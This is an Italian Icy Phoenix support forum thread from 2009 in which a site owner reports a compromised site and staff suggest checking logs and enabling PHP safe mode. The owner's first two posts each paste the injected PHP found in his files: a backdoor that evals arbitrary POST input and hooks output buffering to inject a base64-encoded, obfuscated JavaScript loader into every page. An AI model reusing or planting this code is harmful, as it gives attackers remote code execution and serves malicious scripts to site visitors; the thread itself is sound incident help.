#1 riox Venerdì, 17 Aprile 2009, 17:08
Problema urgente sicurezza:
Il sito mi è stato bucato da 94.247.2.195/news/?id=100
Vi do il link www.viscarani.it/portalesws
HELP!
In pratica compare questa stringa all'inizio dei file php: (index.php, config.php)
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NweHNjcHhycHhpcGhRaHQlMjBzOWtydW9jJTNEJTJGaFFoJTJGdW85Q2M0OWslMkVDYzI0N3B4JTJFMnF0JTJFMTloUWg1JTJGcHhqcXVlcnVveXk5UiUyRWpzOWslM0UlM0M5ayUyRnNDY2N1b3JpOWtwQ2N0JTNFJykucmVwbGFjZSgvcHh8aFFofHF0fHk5Unx1b3xDY3xkS3w5ay9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
Adesso ho fatto l'upload di tutti i file, ma il sito mi è stato disattivato dal supporto per precauzione, mi hanno detto che generava troppo traffico e limitava la navigazione degli altri siti residenti nel server, mi hanno detto che potrebbe esserci qualche stringa dannosa anche a livello di database, dove dovrei controllare di preciso?
Mi hanno detto che il problema è nell'applicativo (Icy) non è loro...
Uso la RC1!
Versione di IP: 1.3.0.53a
Server: Linux
Ultima modifica di riox il Venerdì, 17 Aprile 2009, 21:19, modificato 7 volte in totale
-
 riox 
-
Appassionato
-
- Età: 29
- Registrato: Dicembre 2007
- Messaggi: 543
-
#2 riox Sabato, 18 Aprile 2009, 12:51
Problema urgente sicurezza:
Il sito mi è stato bucato da 94.247.2.195/news/?id=100
Vi do il link www.viscarani.it/portalesws
HELP!
In pratica compare questa stringa all'inizio dei file php: (index.php, config.php)
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NweHNjcHhycHhpcGhRaHQlMjBzOWtydW9jJTNEJTJGaFFoJTJGdW85Q2M0OWslMkVDYzI0N3B4JTJFMnF0JTJFMTloUWg1JTJGcHhqcXVlcnVveXk5UiUyRWpzOWslM0UlM0M5ayUyRnNDY2N1b3JpOWtwQ2N0JTNFJykucmVwbGFjZSgvcHh8aFFofHF0fHk5Unx1b3xDY3xkS3w5ay9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
Adesso ho fatto l'upload di tutti i file, ma il sito mi è stato disattivato dal supporto per precauzione, mi hanno detto che generava troppo traffico e limitava la navigazione degli altri siti residenti nel server, mi hanno detto che potrebbe esserci qualche stringa dannosa anche a livello di database, dove dovrei controllare di preciso?
Mi hanno detto che il problema è nell'applicativo (Icy) non è loro...
Uso la RC1!
Il sito è di nuovo online ma bisogna capire se il problema è di ICY (RC1)...
Versione di IP: 1.3.0.53a
Server: Linux
-
riox
-
Appassionato
-
- Età: 29
- Registrato: Dicembre 2007
- Messaggi: 543
-
#3 riox Sabato, 18 Aprile 2009, 14:11
riox, bisogna vedere i LOG e soprattutto vedere come sono settate le impostazioni di sicurezza del server. Senza questo è difficile capire i motivi di un attacco. E' il primo e l'unico che finora è stato segnalato, quindi mi sembra abbastanza indicativo come fatto.
è proprio questo il problema, l'assistenza mi dice che loro hanno attivate tutte le misure di sicurezza...
ho notato adesso una cosa strana: entrando in acp prima di caricare il menù, in basso mi compare trasferimento dati da: 94.247.2.195 (cioè da chi ha bucato il sito)
Versione di IP: 1.3.0.53a
Server: Linux
Ultima modifica di riox il Sabato, 18 Aprile 2009, 16:01, modificato 2 volte in totale
-
riox
-
Appassionato
-
- Età: 29
- Registrato: Dicembre 2007
- Messaggi: 543
-
#4 Andrea75 Sabato, 18 Aprile 2009, 14:29
riox, mi dici in ACP->CrackerTracker->Manutenzione E Test cosa trovi in rosso?
Versione di IP: 1.3.25.78
Server: Linux
____________ My Icy forum: www.lineameteo.it
Staff Member @ Icy Phoenix.it & Icy Phoenix.com
-
 Andrea75
-
Amministratore
bel tempo con possibili rovesci
-
- Età: 36
- Registrato: Maggio 2007
- Residenza: Perugia
- Messaggi: 3777
-
#5 riox Sabato, 18 Aprile 2009, 14:33
riox, mi dici in ACP->CrackerTracker->Manutenzione E Test cosa trovi in rosso?
Allora:
Batch per definizione euristica dei Worm - numero di definizioni: 87 INATTIVO
» PHP SAFE MODE OFF ON ATTENZIONE
» Conferma visuale OFF ON ATTENZIONE
Versione di IP: 1.3.0.53a
Server: Linux
-
riox
-
Appassionato
-
- Età: 29
- Registrato: Dicembre 2007
- Messaggi: 543
-
#6 Andrea75 Sabato, 18 Aprile 2009, 19:36
E' il SAFE MOD settato ad OFF a mettere a rischio la vulnerabilità del sito e che con tutta probabilità ha aperto le porte a colui che ti ha bucato il sito. Fattelo mettere su ON dall'hosting o a prescindere dal forum e dalla versione che usi avrai sempre rischi di sicurezza.
Versione di IP: 1.3.25.78
Server: Linux
____________ My Icy forum: www.lineameteo.it
Staff Member @ Icy Phoenix.it & Icy Phoenix.com
-
Andrea75
-
Amministratore
bel tempo con possibili rovesci
-
- Età: 36
- Registrato: Maggio 2007
- Residenza: Perugia
- Messaggi: 3777
-
#7 riox Sabato, 18 Aprile 2009, 21:48
Ho chiesto di mettere il SAFE MOD settato ad ON e come risposta mi hanno disattivato nuovamente il sito dicendomi che stava creando problemi agli altri residenti nel server!
Versione di IP: 1.3.0.53a
Server: Linux
-
riox
-
Appassionato
-
- Età: 29
- Registrato: Dicembre 2007
- Messaggi: 543
-
#8 Mighty Gorgon Domenica, 19 Aprile 2009, 11:33
Per favore apri un nuovo topic per questo problema.
Cerca di ottenere il log per capire come il sito è stato bucato.
Senza log non si può capire da cosa dipende il problema.
Versione di IP: 3.X
Server: Linux
____________
Luca
-
Mighty Gorgon
-
I wanna love you tender
-
- Età: 37
- Registrato: Maggio 2007
- Residenza: Borgo San Michele
- Messaggi: 1608
-
#9 riox Domenica, 19 Aprile 2009, 16:47
Per favore apri un nuovo topic per questo problema.
Cerca di ottenere il log per capire come il sito è stato bucato.
Senza log non si può capire da cosa dipende il problema.
Giusto, potete spostare i post che riguardano questo problema creando un nuovo topic?
Grazie.
Versione di IP: 1.3.0.53a
Server: Linux
-
riox
-
Appassionato
-
- Età: 29
- Registrato: Dicembre 2007
- Messaggi: 543
-
#10 FedericoBiccheddu Domenica, 19 Aprile 2009, 16:51
Ho diviso io, nel caso il titolo non è abbastanza esplicito modificate voi 
Versione di IP: 1.3.15 (αlphα)
Server: Linux
____________ Per favore inserisci nel tuo Profilo la versione di Icy Phoenix e il Server utilizzato.
-
FedericoBiccheddu
-
Veterano
-
- Età: 20
- Registrato: Dicembre 2007
- Residenza: Sant'Antioco
- Messaggi: 2593
-
 Questo argomento è stato utile?
 Questo argomento è stato utile?
| Condividi Argomento |
|---|
|
 | | Inserisci un link per questo argomento |
|---|
| URL |
|
| BBCode |
|
| HTML |
|
Argomenti Simili
Argomenti Simili
| Argomento |
Autore |
Forum |
Risposte |
Ultimo Messaggio |
 |
Come creare una pagina nuova con il CMS?
|
FedericoBiccheddu |
Archivio 'Supporto Generale' |
7 |
Martedì, 26 Febbraio 2008, 10:52 
hpl |
 |
icyphoenix.it ha una nuova casa
|
Andrea75 |
News e Annunci |
12 |
Lunedì, 16 Febbraio 2009, 12:42
Andrea75 |
 |
Sito aggiornato all'ultima versione di svi...
|
Andrea75 |
News e Annunci |
61 |
Domenica, 22 Marzo 2009, 22:01
FedericoBiccheddu |
|
Sonata Arctica-nuova Canzone
|
system90 |
Off Topic |
9 |
Mercoledì, 21 Ottobre 2009, 09:44
Mighty Gorgon |
 |
Annuncio: Sito aggiornato all'ultima versione di svi...
|
Andrea75 |
News e Annunci |
6 |
Giovedì, 06 Ottobre 2011, 09:02
Andrea75 |
Lista Permessi
|
Non puoi inserire nuovi Argomenti
Non puoi rispondere ai Messaggi
Non puoi modificare i tuoi Messaggi
Non puoi cancellare i tuoi Messaggi
Non puoi votare nei Sondaggi
Non puoi allegare files
Non puoi scaricare gli allegati
Non puoi inserire eventi calendario
|
|
|
|
|
Sito bucato, nuova versione Icy Phoenix RC1
